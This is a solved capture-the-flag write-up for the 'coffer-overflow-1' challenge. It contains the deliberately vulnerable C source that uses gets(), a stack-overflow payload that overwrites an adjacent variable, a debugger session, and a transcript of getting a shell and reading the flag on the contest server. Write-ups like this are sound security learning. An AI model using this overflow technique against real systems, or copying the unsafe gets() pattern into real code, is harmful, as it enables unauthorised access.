# (solved) pwn/coffer-overflow-1 ```C #include <stdio.h> #include <string.h> int main(void) { long code = 0; char name[16]; setbuf(stdout, NULL); setbuf(stdin, NULL); setbuf(stderr, NULL); puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); puts("What do you want to fill your coffer with?"); gets(name); if(code == 0xcafebabe) { system("/bin/sh"); } } ``` Exploit: ```bash python3 -c 'import sys; sys.stdout.buffer.write(b"B"*24 + b"\xbe\xba\xfe\xca")' > input ``` ```bash pwndbg> disassemble main Dump of assembler code for function main: ... 0x00000000004006e2 <+107>: call 0x400580 <gets@plt> 0x00000000004006e7 <+112>: mov eax,0xcafebabe 0x00000000004006ec <+117>: cmp QWORD PTR [rbp-0x8],rax 0x00000000004006f0 <+121>: jne 0x400703 <main+140> 0x00000000004006f2 <+123>: lea rdi,[rip+0x11a] 0x00000000004006f9 <+130>: mov eax,0x0 0x00000000004006fe <+135>: call 0x400570 <system@plt> 0x0000000000400703 <+140>: mov eax,0x0 0x0000000000400708 <+145>: leave 0x0000000000400709 <+146>: ret pwndbg> break *main+121 pwndbg> run < input Breakpoint 1, 0x00000000004006f0 in main () pwndbg> ni pwndbg> x/x $rbp-8 0x7fffffffe0e8: 0xcafebabe pwndbg> i r rip rip 0x4006f2 0x4006f2 <main+123> pwndbg> x/x $rbp-8 0x7fffffffe0e8: 0xcafebabe ``` I can get the exploit to work in GDB but not without running it in GDB. Fuck fuck fuck I had had to place a newline at the end. Replace send() with sendline() in my exploit script. ```bash # ./doit.py [+] Opening connection to 2020.redpwnc.tf on port 31255: Done b'Welcome to coffer overflow, where our coffers are overfilling with bytes ;)\n' b'What do you want to fill your coffer with?' [*] Switching to interactive mode $ ls Makefile bin coffer-overflow-1 coffer-overflow-1.c dev flag.txt lib lib32 lib64 $ cat flag.txt flag{th1s_0ne_wasnt_pure_gu3ssing_1_h0pe} $ [*] Interrupted ```